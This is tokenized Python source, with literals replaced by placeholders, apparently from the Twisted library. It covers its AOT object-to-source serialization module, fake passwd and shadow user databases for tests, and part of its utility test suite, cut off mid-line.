<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import types , re <EOL> try : <EOL> from tokenize import generate_tokens as tokenize <EOL> except ImportError : <EOL> from tokenize import tokenize <EOL> try : <EOL> import copy_reg <EOL> except : <EOL> import copyreg as copy_reg <EOL> from twisted . python import reflect , log <EOL> from twisted . persisted import crefutil <EOL> from twisted . python . compat import unicode , _PY3 , _constructMethod <EOL> class Named : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> class Class ( Named ) : <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class Function ( Named ) : <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class Module ( Named ) : <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class InstanceMethod : <EOL> def __init__ ( self , name , klass , inst ) : <EOL> if not ( isinstance ( inst , Ref ) or isinstance ( inst , Instance ) or isinstance ( inst , Deref ) ) : <EOL> raise TypeError ( "<STR_LIT>" % inst ) <EOL> self . name = name <EOL> self . klass = klass <EOL> self . instance = inst <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . klass , prettify ( self . instance ) ) <EOL> class _NoStateObj : <EOL> pass <EOL> NoStateObj = _NoStateObj ( ) <EOL> _SIMPLE_BUILTINS = [ <EOL> bool , bytes , unicode , int , float , complex , type ( None ) , <EOL> slice , type ( Ellipsis ) <EOL> ] <EOL> try : <EOL> _SIMPLE_BUILTINS . append ( long ) <EOL> except NameError : <EOL> pass <EOL> class Instance : <EOL> def __init__ ( self , className , __stateObj__ = NoStateObj , ** state ) : <EOL> if not isinstance ( className , str ) : <EOL> raise TypeError ( "<STR_LIT>" % className ) <EOL> self . klass = className <EOL> if __stateObj__ is not NoStateObj : <EOL> self . state = __stateObj__ <EOL> self . stateIsDict = <NUM_LIT:0> <EOL> else : <EOL> self . state = state <EOL> self . stateIsDict = <NUM_LIT:1> <EOL> def getSource ( self ) : <EOL> if self . stateIsDict : <EOL> stateDict = self . state <EOL> elif isinstance ( self . state , Ref ) and isinstance ( self . state . obj , dict ) : <EOL> stateDict = self . state . obj <EOL> else : <EOL> stateDict = None <EOL> if stateDict is not None : <EOL> try : <EOL> return "<STR_LIT>" % ( self . klass , dictToKW ( stateDict ) ) <EOL> except NonFormattableDict : <EOL> return "<STR_LIT>" % ( self . klass , prettify ( stateDict ) ) <EOL> return "<STR_LIT>" % ( self . klass , prettify ( self . state ) ) <EOL> class Ref : <EOL> def __init__ ( self , * args ) : <EOL> if len ( args ) == <NUM_LIT:2> : <EOL> self . refnum = args [ <NUM_LIT:0> ] <EOL> self . obj = args [ <NUM_LIT:1> ] <EOL> elif not args : <EOL> self . refnum = None <EOL> self . obj = None <EOL> def setRef ( self , num ) : <EOL> if self . refnum : <EOL> raise ValueError ( "<STR_LIT>" % ( num , self . refnum ) ) <EOL> self . refnum = num <EOL> def setObj ( self , obj ) : <EOL> if self . obj : <EOL> raise ValueError ( "<STR_LIT>" % ( obj , self . obj ) ) <EOL> self . obj = obj <EOL> def getSource ( self ) : <EOL> if self . obj is None : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> if self . refnum : <EOL> return "<STR_LIT>" % ( self . refnum , prettify ( self . obj ) ) <EOL> return prettify ( self . obj ) <EOL> class Deref : <EOL> def __init__ ( self , num ) : <EOL> self . refnum = num <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % self . refnum <EOL> __repr__ = getSource <EOL> class Copyreg : <EOL> def __init__ ( self , loadfunc , state ) : <EOL> self . loadfunc = loadfunc <EOL> self . state = state <EOL> def getSource ( self ) : <EOL> return "<STR_LIT>" % ( self . loadfunc , prettify ( self . state ) ) <EOL> def getSource ( ao ) : <EOL> """<STR_LIT>""" <EOL> return indentify ( "<STR_LIT>" + prettify ( ao ) ) <EOL> class NonFormattableDict ( Exception ) : <EOL> """<STR_LIT>""" <EOL> r = re . compile ( '<STR_LIT>' ) <EOL> def dictToKW ( d ) : <EOL> out = [ ] <EOL> items = list ( d . items ( ) ) <EOL> items . sort ( ) <EOL> for k , v in items : <EOL> if not isinstance ( k , str ) : <EOL> raise NonFormattableDict ( "<STR_LIT>" % k ) <EOL> if not r . match ( k ) : <EOL> raise NonFormattableDict ( "<STR_LIT>" % k ) <EOL> out . append ( <EOL> "<STR_LIT>" % ( k , prettify ( v ) ) <EOL> ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> def prettify ( obj ) : <EOL> if hasattr ( obj , '<STR_LIT>' ) : <EOL> return obj . getSource ( ) <EOL> else : <EOL> t = type ( obj ) <EOL> if t in _SIMPLE_BUILTINS : <EOL> return repr ( obj ) <EOL> elif t is dict : <EOL> out = [ '<STR_LIT:{>' ] <EOL> for k , v in obj . items ( ) : <EOL> out . append ( '<STR_LIT>' % ( prettify ( k ) , prettify ( v ) ) ) <EOL> out . append ( len ( obj ) and '<STR_LIT>' or '<STR_LIT:}>' ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> elif t is list : <EOL> out = [ "<STR_LIT:[>" ] <EOL> for x in obj : <EOL> out . append ( '<STR_LIT>' % prettify ( x ) ) <EOL> out . append ( len ( obj ) and '<STR_LIT>' or '<STR_LIT:]>' ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> elif t is tuple : <EOL> out = [ "<STR_LIT:(>" ] <EOL> for x in obj : <EOL> out . append ( '<STR_LIT>' % prettify ( x ) ) <EOL> out . append ( len ( obj ) and '<STR_LIT>' or '<STR_LIT:)>' ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % ( t , obj ) ) <EOL> def indentify ( s ) : <EOL> out = [ ] <EOL> stack = [ ] <EOL> l = [ '<STR_LIT>' , s ] <EOL> for ( tokenType , tokenString , ( startRow , startColumn ) , <EOL> ( endRow , endColumn ) , logicalLine ) in tokenize ( l . pop ) : <EOL> if tokenString in [ '<STR_LIT:[>' , '<STR_LIT:(>' , '<STR_LIT:{>' ] : <EOL> stack . append ( tokenString ) <EOL> elif tokenString in [ '<STR_LIT:]>' , '<STR_LIT:)>' , '<STR_LIT:}>' ] : <EOL> stack . pop ( ) <EOL> if tokenString == '<STR_LIT>' : <EOL> out . append ( '<STR_LIT:U+0020>' * len ( stack ) ) <EOL> else : <EOL> out . append ( tokenString ) <EOL> return '<STR_LIT>' . join ( out ) <EOL> def unjellyFromAOT ( aot ) : <EOL> """<STR_LIT>""" <EOL> return AOTUnjellier ( ) . unjelly ( aot ) <EOL> def unjellyFromSource ( stringOrFile ) : <EOL> """<STR_LIT>""" <EOL> ns = { "<STR_LIT>" : Instance , <EOL> "<STR_LIT>" : InstanceMethod , <EOL> "<STR_LIT>" : Class , <EOL> "<STR_LIT>" : Function , <EOL> "<STR_LIT>" : Module , <EOL> "<STR_LIT>" : Ref , <EOL> "<STR_LIT>" : Deref , <EOL> "<STR_LIT>" : Copyreg , <EOL> } <EOL> if hasattr ( stringOrFile , "<STR_LIT>" ) : <EOL> source = stringOrFile . read ( ) <EOL> else : <EOL> source = stringOrFile <EOL> code = compile ( source , "<STR_LIT>" , "<STR_LIT>" ) <EOL> eval ( code , ns , ns ) <EOL> if '<STR_LIT>' in ns : <EOL> return unjellyFromAOT ( ns [ '<STR_LIT>' ] ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % stringOrFile ) <EOL> class AOTUnjellier : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . references = { } <EOL> self . stack = [ ] <EOL> self . afterUnjelly = [ ] <EOL> def unjellyLater ( self , node ) : <EOL> """<STR_LIT>""" <EOL> d = crefutil . _Defer ( ) <EOL> self . unjellyInto ( d , <NUM_LIT:0> , node ) <EOL> return d <EOL> def unjellyInto ( self , obj , loc , ao ) : <EOL> """<STR_LIT>""" <EOL> o = self . unjellyAO ( ao ) <EOL> obj [ loc ] = o <EOL> if isinstance ( o , crefutil . NotKnown ) : <EOL> o . addDependant ( obj , loc ) <EOL> return o <EOL> def callAfter ( self , callable , result ) : <EOL> if isinstance ( result , crefutil . NotKnown ) : <EOL> l = [ None ] <EOL> result . addDependant ( l , <NUM_LIT:1> ) <EOL> else : <EOL> l = [ result ] <EOL> self . afterUnjelly . append ( ( callable , l ) ) <EOL> def unjellyAttribute ( self , instance , attrName , ao ) : <EOL> """<STR_LIT>""" <EOL> self . unjellyInto ( instance . __dict__ , attrName , ao ) <EOL> def unjellyAO ( self , ao ) : <EOL> """<STR_LIT>""" <EOL> self . stack . append ( ao ) <EOL> t = type ( ao ) <EOL> if t in _SIMPLE_BUILTINS : <EOL> return ao <EOL> elif t is list : <EOL> l = [ ] <EOL> for x in ao : <EOL> l . append ( None ) <EOL> self . unjellyInto ( l , len ( l ) - <NUM_LIT:1> , x ) <EOL> return l <EOL> elif t is tuple : <EOL> l = [ ] <EOL> tuple_ = tuple <EOL> for x in ao : <EOL> l . append ( None ) <EOL> if isinstance ( self . unjellyInto ( l , len ( l ) - <NUM_LIT:1> , x ) , crefutil . NotKnown ) : <EOL> tuple_ = crefutil . _Tuple <EOL> return tuple_ ( l ) <EOL> elif t is dict : <EOL> d = { } <EOL> for k , v in ao . items ( ) : <EOL> kvd = crefutil . _DictKeyAndValue ( d ) <EOL> self . unjellyInto ( kvd , <NUM_LIT:0> , k ) <EOL> self . unjellyInto ( kvd , <NUM_LIT:1> , v ) <EOL> return d <EOL> else : <EOL> c = ao . __class__ <EOL> if c is Module : <EOL> return reflect . namedModule ( ao . name ) <EOL> elif c in [ Class , Function ] or issubclass ( c , type ) : <EOL> return reflect . namedObject ( ao . name ) <EOL> elif c is InstanceMethod : <EOL> im_name = ao . name <EOL> im_class = reflect . namedObject ( ao . klass ) <EOL> im_self = self . unjellyAO ( ao . instance ) <EOL> if im_name in im_class . __dict__ : <EOL> if im_self is None : <EOL> return getattr ( im_class , im_name ) <EOL> elif isinstance ( im_self , crefutil . NotKnown ) : <EOL> return crefutil . _InstanceMethod ( im_name , im_self , im_class ) <EOL> else : <EOL> return _constructMethod ( im_class , im_name , im_self ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif c is Instance : <EOL> klass = reflect . namedObject ( ao . klass ) <EOL> state = self . unjellyAO ( ao . state ) <EOL> if hasattr ( klass , "<STR_LIT>" ) : <EOL> inst = klass . __new__ ( klass ) <EOL> else : <EOL> inst = _OldStyleInstance ( klass ) <EOL> if hasattr ( klass , "<STR_LIT>" ) : <EOL> self . callAfter ( inst . __setstate__ , state ) <EOL> else : <EOL> inst . __dict__ = state <EOL> return inst <EOL> elif c is Ref : <EOL> o = self . unjellyAO ( ao . obj ) <EOL> refkey = ao . refnum <EOL> ref = self . references . get ( refkey ) <EOL> if ref is None : <EOL> self . references [ refkey ] = o <EOL> elif isinstance ( ref , crefutil . NotKnown ) : <EOL> ref . resolveDependants ( o ) <EOL> self . references [ refkey ] = o <EOL> elif refkey is None : <EOL> pass <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( ref , refkey , ao ) ) <EOL> return o <EOL> elif c is Deref : <EOL> num = ao . refnum <EOL> ref = self . references . get ( num ) <EOL> if ref is None : <EOL> der = crefutil . _Dereference ( num ) <EOL> self . references [ num ] = der <EOL> return der <EOL> return ref <EOL> elif c is Copyreg : <EOL> loadfunc = reflect . namedObject ( ao . loadfunc ) <EOL> d = self . unjellyLater ( ao . state ) . addCallback ( <EOL> lambda result , _l : _l ( * result ) , loadfunc ) <EOL> return d <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % t ) <EOL> del self . stack [ - <NUM_LIT:1> ] <EOL> def unjelly ( self , ao ) : <EOL> try : <EOL> l = [ None ] <EOL> self . unjellyInto ( l , <NUM_LIT:0> , ao ) <EOL> for func , v in self . afterUnjelly : <EOL> func ( v [ <NUM_LIT:0> ] ) <EOL> return l [ <NUM_LIT:0> ] <EOL> except : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( "<STR_LIT:\n>" . join ( map ( repr , self . stack ) ) ) <EOL> raise <EOL> def jellyToAOT ( obj ) : <EOL> """<STR_LIT>""" <EOL> return AOTJellier ( ) . jelly ( obj ) <EOL> def jellyToSource ( obj , file = None ) : <EOL> """<STR_LIT>""" <EOL> aot = jellyToAOT ( obj ) <EOL> if file : <EOL> file . write ( getSource ( aot ) . encode ( "<STR_LIT:utf-8>" ) ) <EOL> else : <EOL> return getSource ( aot ) <EOL> try : <EOL> from types import ( ClassType as _OldStyleClass , <EOL> InstanceType as _OldStyleInstance ) <EOL> except ImportError : <EOL> _OldStyleClass = None <EOL> _OldStyleInstance = None <EOL> def _classOfMethod ( methodObject ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> return methodObject . __self__ . __class__ <EOL> return methodObject . im_class <EOL> def _funcOfMethod ( methodObject ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> return methodObject . __func__ <EOL> return methodObject . im_func <EOL> def _selfOfMethod ( methodObject ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> return methodObject . __self__ <EOL> return methodObject . im_self <EOL> class AOTJellier : <EOL> def __init__ ( self ) : <EOL> self . prepared = { } <EOL> self . _ref_id = <NUM_LIT:0> <EOL> self . stack = [ ] <EOL> def prepareForRef ( self , aoref , object ) : <EOL> """<STR_LIT>""" <EOL> self . prepared [ id ( object ) ] = aoref <EOL> def jellyToAO ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> objType = type ( obj ) <EOL> self . stack . append ( repr ( obj ) ) <EOL> if objType in _SIMPLE_BUILTINS : <EOL> retval = obj <EOL> elif objType is types . MethodType : <EOL> retval = InstanceMethod ( _funcOfMethod ( obj ) . __name__ , <EOL> reflect . qual ( _classOfMethod ( obj ) ) , <EOL> self . jellyToAO ( _selfOfMethod ( obj ) ) ) <EOL> elif objType is types . ModuleType : <EOL> retval = Module ( obj . __name__ ) <EOL> elif objType is _OldStyleClass : <EOL> retval = Class ( reflect . qual ( obj ) ) <EOL> elif issubclass ( objType , type ) : <EOL> retval = Class ( reflect . qual ( obj ) ) <EOL> elif objType is types . FunctionType : <EOL> retval = Function ( reflect . fullFuncName ( obj ) ) <EOL> else : <EOL> if id ( obj ) in self . prepared : <EOL> oldRef = self . prepared [ id ( obj ) ] <EOL> if oldRef . refnum : <EOL> key = oldRef . refnum <EOL> else : <EOL> self . _ref_id = self . _ref_id + <NUM_LIT:1> <EOL> key = self . _ref_id <EOL> oldRef . setRef ( key ) <EOL> return Deref ( key ) <EOL> retval = Ref ( ) <EOL> def _stateFrom ( state ) : <EOL> retval . setObj ( Instance ( reflect . qual ( obj . __class__ ) , <EOL> self . jellyToAO ( state ) ) ) <EOL> self . prepareForRef ( retval , obj ) <EOL> if objType is list : <EOL> retval . setObj ( [ self . jellyToAO ( o ) for o in obj ] ) <EOL> elif objType is tuple : <EOL> retval . setObj ( tuple ( map ( self . jellyToAO , obj ) ) ) <EOL> elif objType is dict : <EOL> d = { } <EOL> for k , v in obj . items ( ) : <EOL> d [ self . jellyToAO ( k ) ] = self . jellyToAO ( v ) <EOL> retval . setObj ( d ) <EOL> elif objType in copy_reg . dispatch_table : <EOL> unpickleFunc , state = copy_reg . dispatch_table [ objType ] ( obj ) <EOL> retval . setObj ( Copyreg ( reflect . fullFuncName ( unpickleFunc ) , <EOL> self . jellyToAO ( state ) ) ) <EOL> elif hasattr ( obj , "<STR_LIT>" ) : <EOL> _stateFrom ( obj . __getstate__ ( ) ) <EOL> elif hasattr ( obj , "<STR_LIT>" ) : <EOL> _stateFrom ( obj . __dict__ ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % objType . __name__ ) <EOL> del self . stack [ - <NUM_LIT:1> ] <EOL> return retval <EOL> def jelly ( self , obj ) : <EOL> try : <EOL> ao = self . jellyToAO ( obj ) <EOL> return ao <EOL> except : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( '<STR_LIT:\n>' . join ( self . stack ) ) <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> from . _wrapper import proxyEndpoint <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class _UserRecord ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , password , uid , gid , gecos , home , shell ) : <EOL> self . pw_name = name <EOL> self . pw_passwd = password <EOL> self . pw_uid = uid <EOL> self . pw_gid = gid <EOL> self . pw_gecos = gecos <EOL> self . pw_dir = home <EOL> self . pw_shell = shell <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:7> <EOL> def __getitem__ ( self , index ) : <EOL> return ( <EOL> self . pw_name , self . pw_passwd , self . pw_uid , <EOL> self . pw_gid , self . pw_gecos , self . pw_dir , self . pw_shell ) [ index ] <EOL> class UserDatabase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _users = [ ] <EOL> def addUser ( self , username , password , uid , gid , gecos , home , shell ) : <EOL> """<STR_LIT>""" <EOL> self . _users . append ( _UserRecord ( <EOL> username , password , uid , gid , gecos , home , shell ) ) <EOL> def getpwuid ( self , uid ) : <EOL> """<STR_LIT>""" <EOL> for entry in self . _users : <EOL> if entry . pw_uid == uid : <EOL> return entry <EOL> raise KeyError ( ) <EOL> def getpwnam ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for entry in self . _users : <EOL> if entry . pw_name == name : <EOL> return entry <EOL> raise KeyError ( ) <EOL> def getpwall ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _users <EOL> class _ShadowRecord ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , username , password , lastChange , min , max , warn , inact , <EOL> expire , flag ) : <EOL> self . sp_nam = username <EOL> self . sp_pwd = password <EOL> self . sp_lstchg = lastChange <EOL> self . sp_min = min <EOL> self . sp_max = max <EOL> self . sp_warn = warn <EOL> self . sp_inact = inact <EOL> self . sp_expire = expire <EOL> self . sp_flag = flag <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:9> <EOL> def __getitem__ ( self , index ) : <EOL> return ( <EOL> self . sp_nam , self . sp_pwd , self . sp_lstchg , self . sp_min , <EOL> self . sp_max , self . sp_warn , self . sp_inact , self . sp_expire , <EOL> self . sp_flag ) [ index ] <EOL> class ShadowDatabase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _users = [ ] <EOL> def addUser ( self , username , password , lastChange , min , max , warn , inact , <EOL> expire , flag ) : <EOL> """<STR_LIT>""" <EOL> self . _users . append ( _ShadowRecord ( <EOL> username , password , lastChange , <EOL> min , max , warn , inact , expire , flag ) ) <EOL> def getspnam ( self , username ) : <EOL> """<STR_LIT>""" <EOL> for entry in self . _users : <EOL> if entry . sp_nam == username : <EOL> return entry <EOL> raise KeyError <EOL> def getspall ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _users </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import errno <EOL> import os . path <EOL> import shutil <EOL> import sys <EOL> import warnings <EOL> try : <EOL> import pwd , grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> from twisted . trial import unittest <EOL> from twisted . trial . util import suppress as SUPPRESS <EOL> from twisted . python import util <EOL> from twisted . python . reflect import fullyQualifiedName <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . internet import reactor <EOL> from twisted . internet . interfaces import IReactorProcess <EOL> from twisted . internet . protocol import ProcessProtocol <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . internet . error import ProcessDone <EOL> from twisted . test . test_process import MockOS <EOL> pyExe = FilePath ( sys . executable ) . _asBytesPath ( ) <EOL> class UtilTests ( unittest . TestCase ) : <EOL> def testUniq ( self ) : <EOL> l = [ "<STR_LIT:a>" , <NUM_LIT:1> , "<STR_LIT>" , "<STR_LIT:a>" , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] <EOL> self . assertEqual ( util . uniquify ( l ) , [ "<STR_LIT:a>" , <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:6> ] ) <EOL> def testRaises ( self ) : <EOL> self . assertTrue ( util . raises ( ZeroDivisionError , divmod , <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertFalse ( util . raises ( ZeroDivisionError , divmod , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> try : <EOL> util . raises ( TypeError , divmod , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> except ZeroDivisionError : <EOL> pass <EOL> else : <EOL> raise unittest . FailTest ( "<STR_LIT>" ) <EOL> def test_uidFromNumericString ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( util . uidFromString ( "<STR_LIT:100>" ) , <NUM_LIT:100> ) <EOL> def test_uidFromUsernameString ( self ) : <EOL> """<STR_LIT>""" <EOL> pwent = pwd . getpwuid ( os . getuid ( ) ) <EOL> self . assertEqual ( util . uidFromString ( pwent . pw_name ) , pwent . pw_uid ) <EOL> if pwd is None : <EOL> test_uidFromUsernameString . skip = ( <EOL> "<STR_LIT>" ) <EOL> def test_gidFromNumericString ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( util . gidFromString ( "<STR_LIT:100>" ) , <NUM_LIT:100> ) <EOL> def test_gidFromGroupnameString ( self ) : <EOL> """<STR_LIT>""" <EOL> grent = grp . getgrgid ( os . getgid ( ) ) <EOL> self . assertEqual ( util . gidFromString ( grent . gr_name ) , grent . gr_gid ) <EOL> if grp is None : <EOL> test_gidFromGroupnameString . skip = ( <EOL> "<STR_LIT>" ) <EOL> class NameToLabelTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_nameToLabel ( self ) : <EOL> """<STR_LIT>""" <EOL> nameData = [ <EOL> ( '<STR_LIT:f>' , '<STR_LIT:F>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> for inp , out in nameData : <EOL> got = util . nameToLabel ( inp ) <EOL> self . assertEqual ( <EOL> got , out , <EOL> "<STR_LIT>" % ( inp , got , out ) ) <EOL> class UntilConcludesTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_uninterruptably ( self ) : <EOL> """<STR_LIT>""" <EOL> def f ( a , b ) : <EOL> self . calls += <NUM_LIT:1> <EOL> exc = self . exceptions . pop ( ) <EOL> if exc is not None : <EOL> raise exc ( errno . EINTR , "<STR_LIT>" ) <EOL> return a + b <EOL> self . exceptions = [ None ] <EOL> self . calls = <NUM_LIT:0> <EOL> self . assertEqual ( util . untilConcludes ( f , <NUM_LIT:1> , <NUM_LIT:2> ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( self . calls , <NUM_LIT:1> ) <EOL> self . exceptions = [ None , OSError , IOError ] <EOL> self . calls = <NUM_LIT:0> <EOL> self . assertEqual ( util . untilConcludes ( f , <NUM_LIT:2> , <NUM_LIT:3> ) , <NUM_LIT:5> ) <EOL> self . assertEqual ( self . calls , <NUM_LIT:3> ) <EOL> class SwitchUIDTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( os , "<STR_LIT>" , None ) is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . mockos = MockOS ( ) <EOL> self . patch ( util , "<STR_LIT>" , self . mockos ) <EOL> self . patch ( util , "<STR_LIT>" , self . initgroups ) <EOL> self . initgroupsCalls = [ ] <EOL> def initgroups ( self , uid , gid ) : <EOL> """<STR_LIT>""" <EOL> self . initgroupsCalls . append ( ( uid , gid ) ) <EOL> def test_uid ( self ) : <EOL> """<STR_LIT>""" <EOL> util . switchUID ( <NUM_LIT> , None ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ( <NUM_LIT> , None ) ] ) <EOL> self . assertEqual ( self . mockos . actions , [ ( "<STR_LIT>" , <NUM_LIT> ) ] ) <EOL> def test_euid ( self ) : <EOL> """<STR_LIT>""" <EOL> util . switchUID ( <NUM_LIT> , None , True ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ( <NUM_LIT> , None ) ] ) <EOL> self . assertEqual ( self . mockos . seteuidCalls , [ <NUM_LIT> ] ) <EOL> def test_currentUID ( self ) : <EOL> """<STR_LIT>""" <EOL> uid = self . mockos . getuid ( ) <EOL> util . switchUID ( uid , None ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ] ) <EOL> self . assertEqual ( self . mockos . actions , [ ] ) <EOL> currentWarnings = self . flushWarnings ( [ util . switchUID ] ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' % uid , <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' % uid , currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> def test_currentEUID ( self ) : <EOL> """<STR_LIT>""" <EOL> euid = self . mockos . geteuid ( ) <EOL> util . switchUID ( euid , None , True ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ] ) <EOL> self . assertEqual ( self . mockos . seteuidCalls , [ ] ) <EOL> currentWarnings = self . flushWarnings ( [ util . switchUID ] ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' % euid , <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' % euid , currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> class MergeFunctionMetadataTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_mergedFunctionBehavesLikeMergeTarget ( self ) : <EOL> """<STR_LIT>""" <EOL> foo_object = object ( ) <EOL> bar_object = object ( ) <EOL> def foo ( ) : <EOL> return foo_object <EOL> def bar ( x , y , ab , c = <NUM_LIT:10> , * d , ** e ) : <EOL> ( a , b ) = ab <EOL> return bar_object <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertIdentical ( baz ( <NUM_LIT:1> , <NUM_LIT:2> , ( <NUM_LIT:3> , <NUM_LIT:4> ) , quux = <NUM_LIT:10> ) , bar_object ) <EOL> def test_moduleIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> pass <EOL> def bar ( ) : <EOL> pass <EOL> bar . __module__ = '<STR_LIT>' <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( baz . __module__ , foo . __module__ ) <EOL> def test_docstringIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> """<STR_LIT>""" <EOL> def bar ( ) : <EOL> """<STR_LIT>""" <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( baz . __doc__ , foo . __doc__ ) <EOL> def test_nameIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> pass <EOL> def bar ( ) : <EOL> pass <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( baz . __name__ , foo . __name__ ) <EOL> def test_instanceDictionaryIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> pass <EOL> foo . a = <NUM_LIT:1> <EOL> foo . b = <NUM_LIT:2> <EOL> def bar ( ) : <EOL> pass <EOL> bar . b = <NUM_LIT:3> <EOL> bar . c = <NUM_LIT:4> <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( foo . a , baz . a ) <EOL> self . assertEqual ( foo . b , baz . b ) <EOL> self . assertEqual ( bar . c , baz . c ) <EOL> class OrderedDictTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_deprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> from twisted . python . util import OrderedDict <EOL> OrderedDict <EOL> currentWarnings = self . flushWarnings ( offendingFunctions = [ <EOL> self . test_deprecated ] ) <EOL> self . assertEqual ( <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> class InsensitiveDictTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_preserve ( self ) : <EOL> """<STR_LIT>""" <EOL> dct = util . InsensitiveDict ( { '<STR_LIT>' : '<STR_LIT:bar>' , <NUM_LIT:1> : <NUM_LIT:2> , '<STR_LIT>' : { <NUM_LIT:1> : <NUM_LIT:2> } } , preserve = <NUM_LIT:1> ) <EOL> self . assertEqual ( dct [ '<STR_LIT>' ] , { <NUM_LIT:1> : <NUM_LIT:2> } ) <EOL> self . assertEqual ( dct [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( dct . copy ( ) , dct ) <EOL> self . assertEqual ( dct [ '<STR_LIT:foo>' ] , dct . get ( '<STR_LIT>' ) ) <EOL> self . assertIn ( <NUM_LIT:1> , dct ) <EOL> self . assertIn ( 